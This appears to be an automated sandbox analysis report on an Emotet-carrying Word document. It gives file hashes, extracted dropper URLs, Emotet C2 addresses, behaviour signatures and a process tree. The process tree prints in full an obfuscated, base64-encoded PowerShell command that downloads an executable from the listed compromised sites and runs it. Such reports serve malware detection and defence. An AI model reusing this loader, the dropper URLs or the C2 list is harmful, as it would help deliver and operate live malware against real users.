Analysis

  • max time kernel
    24s
  • max time network
    32s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    27-10-2020 22:57

General

  • Target

    6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495.doc

  • Size

    191KB

  • MD5

    5380ac7e6bb601430d526324efcb3be1

  • SHA1

    3a2e6649282590cf90ad5438966c96d412ac11ec

  • SHA256

    6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495

  • SHA512

    246ccb0a5b1abc6a248d4e34affeb0607d4df20f6d39a16a498da56d4125fbd778be4a2b4e6b02f0f4b3f1d494101a2c5edc227cdd969a88cca0efaf1591ffe2

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://mueindustries.com/wp-admin/D/

exe.dropper

http://biharbhumibazar.com/wp-admin/D/

exe.dropper

http://jiehost.com/wp-admin/6ZFh6A/

exe.dropper

http://fit.develab.mx/wp-admin/sjai4FA/

exe.dropper

http://weeklyoutfits.com/how-much/zw2z/

exe.dropper

http://personalizedjigsaws.com/replace_img/qG6D9T/

exe.dropper

http://stabri-thailand.org/cgi-bin/1GKI/

exe.dropper

http://odmova.pl/retranslate/OqLdry/

Extracted

Family

emotet

Botnet

Epoch2

C2

88.153.35.32:80

107.170.146.252:8080

173.212.214.235:7080

167.114.153.111:8080

67.170.250.203:443

121.124.124.40:7080

103.86.49.11:8080

74.214.230.200:80

194.187.133.160:443

172.104.97.173:8080

172.91.208.86:80

200.116.145.225:443

202.134.4.216:8080

172.105.13.66:443

190.164.104.62:80

50.35.17.13:80

176.111.60.55:8080

201.241.127.190:80

66.76.12.94:8080

95.213.236.64:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6d8117453777b13dbab5c583bdcb52b56cfc5dcdba308238eda98a5bbfd95495.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4700
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD IAAgAHMAdgAgACAAeAA4AFkAZQBJAFMAIAAgACgAIAAgAFsAdABZAHAARQBdACgAIgB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHMAWQBzAHQAJwAsACcAUgBlAEMAJwAsACcAVABPAFIAeQAnACwAJwBlACcALAAnAG0ALgBJAE8ALgBkACcALAAnAGkAJwApACAAIAApACAAOwAgACAAIABTAGUAdAAtAEkAVABFAG0AIAAgAFYAQQBSAGkAQQBCAEwAZQA6AEMAZgBMACAAKAAgAFsAVAB5AHAARQBdACgAIgB7ADIAfQB7ADUAfQB7ADgAfQB7ADcAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADMAfQB7ADAAfQAiAC0ARgAgACcAUgAnACwAJwBuAHQAbQAnACwAJwBzACcALAAnAGEATgBhAGcAZQAnACwAJwBFACcALAAnAFkAcwB0AEUATQAuAE4ARQBUACcALAAnAHAAbwBJACcALAAnAEkAYwAnACwAJwAuAFMAZQBSAHYAJwApACkAOwAgACAAJABYAGoAeQBwAHUAbQAzAD0AKAAnAE4AJwArACgAJwAyAGQAaABzACcAKwAnAGEAJwApACsAJwB3ACcAKQA7ACQAUwBsAGYAMAA3AHQAZgA9ACQARwBnADYANQBoAHAAZwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQARgA5ADgAdABqAGIAdQA7ACQARQBuAGIAeAA2ADEAdwA9ACgAJwBTAG4AJwArACgAJwA1ADMAJwArACcANQA3ADMAJwApACkAOwAgACgAIAAgAEcAZQBUAC0AQwBoAEkATABEAGkAVABFAE0AIAB2AEEAUgBpAGEAYgBMAGUAOgBYADgAWQBFAGkAcwAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBDAFIAZQBBAGAAVABlAGQASQByAGUAYwBgAFQAYABPAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcABQAHgAJwArACcAVABzADAAbgBzADgAJwApACsAJwBjACcAKwAoACcAcAAnACsAJwBQAHgAUQAnACkAKwAoACcANgBzACcAKwAnADQAYgAnACkAKwAoACcAYgBmAHAAJwArACcAUAB4ACcAKQApAC4AIgByAGUAcABgAGwAYQBgAEMARQAiACgAKABbAEMAaABBAHIAXQAxADEAMgArAFsAQwBoAEEAcgBdADgAMAArAFsAQwBoAEEAcgBdADEAMgAwACkALAAnAFwAJwApACkAKQA7ACQARgB2AHQANwBoAG0AdgA9ACgAJwBCACcAKwAoACcAdgBoACcAKwAnAHcAcQBqACcAKQArACcAbAAnACkAOwAgACQAYwBGAGwAOgA6ACIAUwBgAGUAYABDAGAAVQBgAFIAaQB0AHkAUAByAG8AVABgAE8AQwBvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEYAcABiAGUAMABfAGMAPQAoACcATwBxACcAKwAoACcAZAA1ACcAKwAnAHYAcAAnACkAKwAnAGsAJwApADsAJABMAG8AbQB3AGwAZgA0ACAAPQAgACgAJwBFACcAKwAnAGsAJwArACgAJwBrAHoAcwAnACsAJwB5AHIAJwApACkAOwAkAFUAdgB1AGsAcwBfAF8APQAoACgAJwBCAG0AdQAnACsAJwBvACcAKQArACcANQB4ACcAKwAnAHkAJwApADsAJABOAGEAbAAyAGkAMwA3AD0AKAAnAEgANgAnACsAJwBxAGYAJwArACgAJwAwAHgAJwArACcAXwAnACkAKQA7ACQASQBuAG0ANAB0AHgAMAA9ACQASABPAE0ARQArACgAKAAnAFQAJwArACgAJwA3AFAAVABzACcAKwAnADAAbgAnACsAJwBzADgAYwAnACkAKwAnAFQAJwArACgAJwA3ACcAKwAnAFAAUQAnACsAJwA2AHMANAAnACkAKwAoACcAYgAnACsAJwBiAGYAVAAnACkAKwAnADcAUAAnACkAIAAtAEMAcgBFAHAAbABhAEMARQAgACgAJwBUACcAKwAnADcAUAAnACkALABbAEMAaABhAHIAXQA5ADIAKQArACQATABvAG0AdwBsAGYANAArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAFkAaABuAG8AcQAzAGEAPQAoACcATQAnACsAJwB4ADMAJwArACgAJwBqACcAKwAnADYANwB0ACcAKQApADsAJABYAHgAdwBrADIANgB6AD0ALgAoACcAbgAnACsAJwBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAdAAuAFcAZQBCAGMATABpAEUATgB0ADsAJABYAHYAbQA5AGcAbwB5AD0AKAAoACcAaAB0AHQAcAAnACsAJwA6AFsAJwArACcAIAB1AE4ASABzACAAXQBbACAAJwArACcAdQBOAEgAcwAgAF0AbQAnACkAKwAoACcAdQBlAGkAJwArACcAbgBkACcAKQArACgAJwB1AHMAJwArACcAdAByACcAKwAnAGkAZQBzAC4AJwArACcAYwBvAG0AWwAnACsAJwAgAHUATgBIACcAKQArACgAJwBzACcAKwAnACAAXQB3AHAALQAnACkAKwAoACcAYQBkAG0AaQAnACsAJwBuAFsAIAAnACsAJwB1ACcAKQArACcATgAnACsAKAAnAEgAcwAgACcAKwAnAF0ARAAnACkAKwAoACcAWwAgACcAKwAnAHUATgBIAHMAJwApACsAKAAnACAAXQBAAGgAdAAnACsAJwB0ACcAKwAnAHAAJwApACsAKAAnADoAJwArACcAWwAgACcAKQArACgAJwB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AWwAnACkAKwAnACAAJwArACcAdQBOACcAKwAnAEgAcwAnACsAJwAgACcAKwAoACcAXQBiAGkAJwArACcAaAAnACkAKwAoACcAYQByACcAKwAnAGIAaAB1ACcAKwAnAG0AJwApACsAKAAnAGkAYgBhAHoAJwArACcAYQByAC4AJwApACsAKAAnAGMAbwAnACsAJwBtACcAKQArACgAJwBbACAAJwArACcAdQAnACkAKwAoACcATgAnACsAJwBIAHMAIAAnACsAJwBdAHcAcAAtACcAKwAnAGEAZABtAGkAJwApACsAJwBuAFsAJwArACgAJwAgACcAKwAnAHUATgBIAHMAIABdACcAKwAnAEQAWwAnACkAKwAoACcAIAB1ACcAKwAnAE4ASAAnACsAJwBzACAAXQAnACkAKwAoACcAQABoACcAKwAnAHQAdABwACcAKwAnADoAWwAnACkAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQAnACsAJwBbACcAKwAnACAAdQBOACcAKQArACgAJwBIAHMAIABdACcAKwAnAGoAaQAnACsAJwBlACcAKQArACgAJwBoACcAKwAnAG8AcwAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtAFsAIAB1AE4AJwApACsAKAAnAEgAcwAgACcAKwAnAF0AJwApACsAKAAnAHcAcAAtAGEAJwArACcAZABtAGkAbgBbACcAKwAnACAAdQBOACcAKwAnAEgAJwApACsAKAAnAHMAIABdADYAJwArACcAWgBGAGgANgAnACsAJwBBAFsAJwApACsAKAAnACAAdQBOAEgAJwArACcAcwAgACcAKwAnAF0AJwApACsAKAAnAEAAaAAnACsAJwB0ACcAKQArACgAJwB0ACcAKwAnAHAAOgBbACAAJwApACsAKAAnAHUAJwArACcATgBIAHMAJwArACcAIABdAFsAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAJwArACcAcwAgAF0AZgBpAHQAJwApACsAKAAnAC4AZAAnACsAJwBlAHYAJwApACsAKAAnAGUAbABhACcAKwAnAGIAJwApACsAKAAnAC4AJwArACcAbQAnACsAJwB4AFsAIAAnACsAJwB1AE4ASABzACAAXQB3AHAALQBhACcAKwAnAGQAJwApACsAJwBtACcAKwAnAGkAbgAnACsAJwBbACcAKwAoACcAIAB1ACcAKwAnAE4ASAAnACkAKwAoACcAcwAnACsAJwAgAF0AJwApACsAKAAnAHMAJwArACcAagBhACcAKQArACgAJwBpADQARgBBAFsAJwArACcAIAB1AE4AJwArACcASAAnACsAJwBzACAAXQAnACkAKwAnAEAAaAAnACsAKAAnAHQAdABwADoAWwAgAHUATgAnACsAJwBIACcAKQArACgAJwBzACAAXQAnACsAJwBbACAAJwArACcAdQBOACcAKQArACgAJwBIAHMAJwArACcAIABdACcAKwAnAHcAZQBlAGsAbAB5ACcAKQArACcAbwB1ACcAKwAoACcAdABmACcAKwAnAGkAdAAnACkAKwAoACcAcwAnACsAJwAuAGMAbwAnACkAKwAoACcAbQAnACsAJwBbACAAdQAnACsAJwBOAEgAcwAnACkAKwAoACcAIABdAGgAJwArACcAbwB3ACcAKQArACgAJwAtAG0AJwArACcAdQBjACcAKQArACcAaAAnACsAKAAnAFsAJwArACcAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAcwAgACcAKQArACgAJwBdACcAKwAnAHoAdwAnACkAKwAnADIAJwArACcAegBbACcAKwAnACAAdQAnACsAKAAnAE4ASABzACcAKwAnACAAXQAnACsAJwBAAGgAdAB0ACcAKQArACgAJwBwADoAWwAnACsAJwAgAHUATgBIAHMAJwArACcAIABdACcAKQArACgAJwBbACAAdQAnACsAJwBOAEgAJwArACcAcwAgAF0AcAAnACsAJwBlAHIAJwArACcAcwBvACcAKQArACgAJwBuAGEAbAAnACsAJwBpACcAKQArACgAJwB6AGUAZAAnACsAJwBqACcAKQArACcAaQBnACcAKwAnAHMAYQAnACsAKAAnAHcAJwArACcAcwAuAGMAbwBtAFsAJwApACsAKAAnACAAJwArACcAdQBOAEgAJwApACsAJwBzACcAKwAoACcAIABdAHIAZQAnACsAJwBwAGwAYQBjACcAKwAnAGUAXwBpACcAKwAnAG0AZwAnACkAKwAoACcAWwAgAHUAJwArACcATgBIACcAKwAnAHMAIAAnACkAKwAoACcAXQBxAEcANgBEACcAKwAnADkAJwApACsAJwBUACcAKwAnAFsAJwArACcAIAB1ACcAKwAnAE4AJwArACgAJwBIAHMAIABdAEAAJwArACcAaAAnACkAKwAoACcAdAB0AHAAOgAnACsAJwBbACAAJwArACcAdQBOAEgAcwAgACcAKQArACgAJwBdAFsAJwArACcAIAB1AE4AJwApACsAKAAnAEgAcwAnACsAJwAgAF0AJwApACsAJwBzACcAKwAoACcAdABhAGIAJwArACcAcgBpACcAKQArACgAJwAtACcAKwAnAHQAaABhAGkAJwApACsAKAAnAGwAJwArACcAYQBuACcAKQArACgAJwBkAC4AbwByACcAKwAnAGcAWwAnACkAKwAnACAAJwArACgAJwB1AE4AJwArACcASAAnACkAKwAoACcAcwAgACcAKwAnAF0AYwBnAGkALQBiAGkAJwArACcAbgAnACkAKwAoACcAWwAgAHUAJwArACcATgBIAHMAJwArACcAIAAnACsAJwBdADEAJwApACsAJwBHAEsAJwArACcASQBbACcAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQBAACcAKwAnAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcAWwAnACkAKwAoACcAIAB1AE4AJwArACcASABzACAAJwApACsAKAAnAF0AWwAnACsAJwAgAHUAJwApACsAJwBOAEgAJwArACcAcwAnACsAKAAnACAAJwArACcAXQBvAGQAJwApACsAJwBtAG8AJwArACgAJwB2ACcAKwAnAGEAJwArACcALgBwAGwAWwAgACcAKwAnAHUATgBIAHMAJwArACcAIABdAHIAJwApACsAKAAnAGUAdAAnACsAJwByAGEAJwApACsAKAAnAG4AcwBsACcAKwAnAGEAJwApACsAKAAnAHQAZQAnACsAJwBbACAAJwApACsAJwB1ACcAKwAoACcATgAnACsAJwBIAHMAJwApACsAJwAgAF0AJwArACgAJwBPAHEATABkAHIAeQBbACcAKwAnACAAJwArACcAdQBOAEgAcwAgACcAKQArACcAXQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAoACcAWwAgACcAKwAnAHUATgBIACcAKQArACcAcwAgACcAKwAnAF0AJwApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACcAZgBzACcAKQBbADAAXQApAC4AIgBTAFAAYABsAGkAdAAiACgAJABRAGIAZgBzAG4AMQB3ACAAKwAgACQAUwBsAGYAMAA3AHQAZgAgACsAIAAkAFMAOABfAHkAdQA1AHQAKQA7ACQASgBiAHAAdwBqAGsANAA9ACgAKAAnAFoAMQAnACsAJwBrAHcAJwApACsAJwBfAHgAJwArACcANAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFkAegAwAHkAMQAyADcAIABpAG4AIAAkAFgAdgBtADkAZwBvAHkAKQB7AHQAcgB5AHsAJABYAHgAdwBrADIANgB6AC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGYAaQBsAGUAIgAoACQAWQB6ADAAeQAxADIANwAsACAAJABJAG4AbQA0AHQAeAAwACkAOwAkAEkANwBzADgAcwByAGYAPQAoACcAUAAnACsAKAAnAG0AJwArACcAegB1ADMAbgBiACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAbgBtADQAdAB4ADAAKQAuACIATABlAG4AYABHAFQASAAiACAALQBnAGUAIAA0ADIANAA5ADgAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAJwArACcAaQBuADMAMgAnACkAKwAoACcAXwAnACsAJwBQAHIAbwBjAGUAJwArACcAcwAnACkAKwAnAHMAJwApACkALgAiAEMAUgBgAGUAYQBUAGUAIgAoACQASQBuAG0ANAB0AHgAMAApADsAJABKADcANQBxADkAawBtAD0AKAAnAEsAcwAnACsAKAAnAHkAcABhACcAKwAnAGIAJwApACsAJwBjACcAKQA7AGIAcgBlAGEAawA7ACQATwBsAHkAbQB3ADgANwA9ACgAKAAnAEUAJwArACcAXwA5ACcAKQArACgAJwB3AGoAJwArACcAMAAnACkAKwAnAHcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAHIAdwAyAF8AMABwAD0AKAAnAEUAJwArACcAeQAnACsAKAAnAGQAJwArACcAMABzADUAdwAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4276
  • C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
    C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4480
    • C:\Windows\SysWOW64\tapisrv\KBDBULG.exe
      "C:\Windows\SysWOW64\tapisrv\KBDBULG.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:4364
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NgcSvc
    1⤵
      PID:4532
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s DeviceAssociationService
      1⤵
        PID:4496
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s NgcCtnrSvc
        1⤵
        • Modifies data under HKEY_USERS
        PID:4676

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
        MD5

        bf55f45edb3c7fefca054aa6882696b7

        SHA1

        1c6ea4d638a7b71d909b5649549e0000a4e51e22

        SHA256

        11d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9

        SHA512

        84f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d

      • C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe
        MD5

        bf55f45edb3c7fefca054aa6882696b7

        SHA1

        1c6ea4d638a7b71d909b5649549e0000a4e51e22

        SHA256

        11d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9

        SHA512

        84f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d

      • C:\Windows\SysWOW64\tapisrv\KBDBULG.exe
        MD5

        bf55f45edb3c7fefca054aa6882696b7

        SHA1

        1c6ea4d638a7b71d909b5649549e0000a4e51e22

        SHA256

        11d00e00e5e06fde23f3793eddb466519bbc97b71b2f2602e3a20e424777e6d9

        SHA512

        84f5eb414ed2301f40367a38edf3eb8fe4323725176be39785cffa5af1430fa21b08b18521975dc4387cfcb71aa8b47899ca396973886123a77318e199665b7d

      • memory/4276-7-0x0000027D58680000-0x0000027D58681000-memory.dmp
        Filesize

        4KB

      • memory/4276-8-0x0000027D58840000-0x0000027D58841000-memory.dmp
        Filesize

        4KB

      • memory/4276-6-0x00007FF8EBA00000-0x00007FF8EC3EC000-memory.dmp
        Filesize

        9.9MB

      • memory/4364-13-0x0000000000000000-mapping.dmp
      • memory/4364-15-0x0000000002130000-0x0000000002142000-memory.dmp
        Filesize

        72KB

      • memory/4364-16-0x0000000000680000-0x0000000000690000-memory.dmp
        Filesize

        64KB

      • memory/4480-11-0x0000000002190000-0x00000000021A2000-memory.dmp
        Filesize

        72KB

      • memory/4480-12-0x0000000000520000-0x0000000000530000-memory.dmp
        Filesize

        64KB

      • memory/4700-0-0x00007FF8F2FA0000-0x00007FF8F35D7000-memory.dmp
        Filesize

        6.2MB

      • memory/4700-1-0x000001F0F6BE6000-0x000001F0F6BEF000-memory.dmp
        Filesize

        36KB